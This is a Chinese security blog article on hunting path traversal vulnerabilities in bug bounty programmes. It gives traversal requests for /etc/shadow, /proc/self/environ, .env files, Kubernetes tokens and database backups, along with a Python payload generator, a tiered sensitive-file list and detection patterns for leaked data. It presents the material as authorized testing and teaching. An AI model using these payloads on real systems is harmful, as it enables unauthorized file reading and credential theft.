文章总结： 本文深入解析SRC中路径遍历漏洞的高级挖掘与利用全链路，涵盖编码混淆、参数污染等变异形态及技术栈检测策略。通过实战演示从文件读取到利用配置文件及日志进行权限升级的过程，并分享了半自动化测试框架。核心建议是建立垂直专长与开发专属工具，强调了深度挖掘此类漏洞的高价值与蓝海特性。 综合评分： 96 文章分类： SRC活动,漏洞分析,渗透测试,安全工具,WEB安全

第三阶段：从漏洞发现到权限升级的完整链条

1. 信息收集的“三明治策略”

底层（操作系统层）

# Linux系统信息GET /download?file=/proc/versionGET /download?file=/proc/cpuinfoGET /download?file=/proc/meminfoGET /download?file=/proc/self/status
# 用户和权限信息GET /download?file=/etc/passwdGET /download?file=/etc/shadowGET /download?file=/etc/groupGET /download?file=/etc/sudoers

中层（应用层）

# 配置文件收集GET /download?file=application.ymlGET /download?file=application.propertiesGET /download?file=config.jsonGET /download?file=.env
# 源码泄露GET /download?file=index.php.bakGET /download?file=web.config.oldGET /download?file=备份_20240101.zip

上层（业务数据层）

# 数据库相关GET /download?file=../data/database.dbGET /download?file=../backups/dump.sqlGET /download?file=../uploads/users.csv
# 会话和缓存GET /download?file=../tmp/sess_*GET /download?file=../cache/*.cache

2. 权限升级的五个关键转折点

转折点1：配置文件中发现凭证

# 在application.yml中发现database:  host: 10.0.0.5  username: app_user  password: "J5@q9!mNp#2"
redis:  password: "r3d!sP@ssw0rd"

转折点2：日志文件中发现访问模式

# 从access.log中发现管理员访问模式192.168.1.100 - - [01/Jan/2024:10:30:00] "GET /admin/panel HTTP/1.1" 200192.168.1.100 - - [01/Jan/2024:10:31:00] "POST /admin/users/create HTTP/1.1" 302
# 测试直接访问管理接口GET /admin/panel?file=../../../etc/shadow

转折点3：备份文件中发现完整数据结构

-- 从database_backup.sql中发现用户表结构CREATE TABLE users (  id INT PRIMARY KEY,  username VARCHAR(50),  password_hash VARCHAR(100),  email VARCHAR(100),  is_admin BOOLEAN DEFAULT false);

转折点4：环境变量中发现云服务凭证

# 从.env或/proc/self/environ中发现AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLEAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEYAWS_REGION=us-west-2

转折点5：内存转储中发现会话令牌

# 通过heapdump或core dump分析GET /actuator/heapdump# 分析后发现在内存中有："session_tokens": {  "admin": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."}

第四阶段：武器化的路径遍历利用框架

我开发了一套半自动化的测试框架，核心模块如下：

1. 智能路径计算引擎

python

class PathTraversalGenerator:    def __init__(self, base_paths, depth=5):        self.base_paths = base_paths        self.depth = depth
    def generate_payloads(self, target_file):        payloads = []        # 传统相对路径        for i in range(1, self.depth + 1):            payloads.append("../" * i + target_file)
        # 编码变种        encodings = ['url', 'double_url', 'utf8', 'html']        for encoding in encodings:            encoded = self.encode_path("../" * 3 + target_file, encoding)            payloads.append(encoded)
        # 绝对路径测试（跨平台）        absolute_paths = [            target_file,  # 无路径前缀            f"/{target_file}",  # Unix绝对路径            f"C:\\Windows\\System32\\{target_file}",  # Windows路径            f"file:///{target_file}",  # File协议        ]        payloads.extend(absolute_paths)
        return payloads

2. 上下文感知的敏感文件字典

我维护的敏感文件字典包含800+条目，按优先级分类：

Tier 1：直接权限升级

text

/etc/passwd/etc/shadow/etc/sudoers/proc/self/environ/.env/var/run/secrets/kubernetes.io/serviceaccount/token

Tier 2：应用配置

text

WEB-INF/web.xmlWEB-INF/classes/application.propertiesconfig/database.ymlapp/configs/production.json

Tier 3：业务数据

text

/data/database.db/backups/dump.sql/uploads/user_export.csv/logs/application.log

3. 自动化验证与影响评估

python

def assess_vulnerability(response, payload, context):    """评估路径遍历漏洞的实际影响"""    indicators = {        'passwd': ['root:', 'daemon:', 'bin:'],        'shadow': ['root:$', ':\$[0-9]\$'],        'env': ['PATH=', 'HOME=', 'SECRET_KEY='],        'config': ['password', 'secret', 'key', 'token'],        'sql': ['CREATE TABLE', 'INSERT INTO'],        'log': ['GET /', 'POST /', 'session=']    }
    impact_score = 0    matched_patterns = []
    for pattern_type, patterns in indicators.items():        for pattern in patterns:            if re.search(pattern, response.text, re.IGNORECASE):                impact_score += IMPACT_WEIGHTS[pattern_type]                matched_patterns.append(f"{pattern_type}:{pattern}")
    return {        'payload': payload,        'vulnerable': impact_score > 0,        'impact_score': impact_score,        'matched_patterns': matched_patterns,        'context': context    }

#

实战成果：三个月专项狩猎报告

在针对路径遍历漏洞的三个月专项测试中：

目标范围：15家互联网公司的SRC计划

测试方法：手动测试+半自动化框架辅助

提交漏洞：47个有效路径遍历漏洞

漏洞等级分布：

高危：12个（25.5%）

中危：28个（59.6%）

低危：7个（14.9%）

典型漏洞模式：

文件下载API未验证路径（18例，38.3%）

日志查看功能目录穿越（11例，23.4%）

备份恢复功能路径注入（9例，19.1%）

图片处理参数污染（5例，10.6%）

配置文件读取未过滤（4例，8.5%）

最高单笔奖金：四舍五入大约有8000元（某金融科技公司，可读取数据库备份文件）

总奖金收益：四舍五入过万元（平均每月四舍五入过万元）

专业价值：为什么路径遍历值得深度挖掘

检测盲区：大多数DAST扫描器仅测试基础../模式，缺乏深度上下文分析

业务影响：可直接访问配置文件、源代码、业务数据，影响远超XSS等前端漏洞

利用稳定：文件系统操作通常无需复杂条件竞争或环境依赖

权限升级：往往是进入内网、获取凭证、提升权限的起点

三条建议

建立垂直专长：在某个漏洞类型上达到行业顶尖5%水平，比泛泛了解所有漏洞更有价值

开发专属工具：通用工具覆盖通用场景，专业场景需要专业工具

输出方法论：将个人经验转化为可复用的方法论，建立行业影响力

路径遍历不是“低级”漏洞，而是需要深度理解文件系统、Web服务器、应用程序框架和业务上下文的复杂攻击面。当大多数人还在使用自动化工具进行浅层测试时，深度研究者已经在这个领域建立了难以逾越的专业壁垒。

（本文所述技术均在合法授权范围内使用，所有测试均已获得目标系统所有者明确许可。未经授权的测试可能违反法律法规。）

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：逍遥子讲安全 技术爱好者 技术爱好者《细一点 你说的没有含金量了从爬虫到特权：SRC路径遍历漏洞的全链路狩猎》